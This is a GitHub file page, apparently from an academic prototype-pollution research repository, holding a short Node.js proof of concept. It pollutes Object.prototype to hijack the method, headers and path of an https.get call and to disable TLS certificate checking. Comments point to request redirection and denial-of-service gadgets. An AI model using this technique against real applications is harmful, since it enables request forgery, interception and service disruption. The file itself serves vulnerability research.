forked from KTH-LangSec/server-side-prototype-pollution
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathget.options.PoC.js
More file actions
31 lines (23 loc) · 811 Bytes
/
get.options.PoC.js
File metadata and controls
31 lines (23 loc) · 811 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
const https = require('https');
Object.prototype.method = "POST";
// Object.prototype.port = 3000;
Object.prototype.headers = {test: 123, host: 'fake'};
Object.prototype.path = '/test';
Object.prototype.NODE_TLS_REJECT_UNAUTHORIZED = '0';
//Object.prototype.hostname = "example.com" // send requist to this address and ignore host
//Object.prototype.session = 1 // DoS
//Object.prototype.ALPNProtocols = ['http/1.0'] // DoS or changing protocol if the server supports it
const options = {
host: 'localhost',
//rejectUnauthorized: false // to ignore self-signed certificate errors
};
const req = https.get(options, (res) => {
console.log(`statusCode: ${res.statusCode}`);
res.on('data', (d) => {
process.stdout.write(d);
});
});
req.on('error', (e) => {
console.error(e);
});
req.end();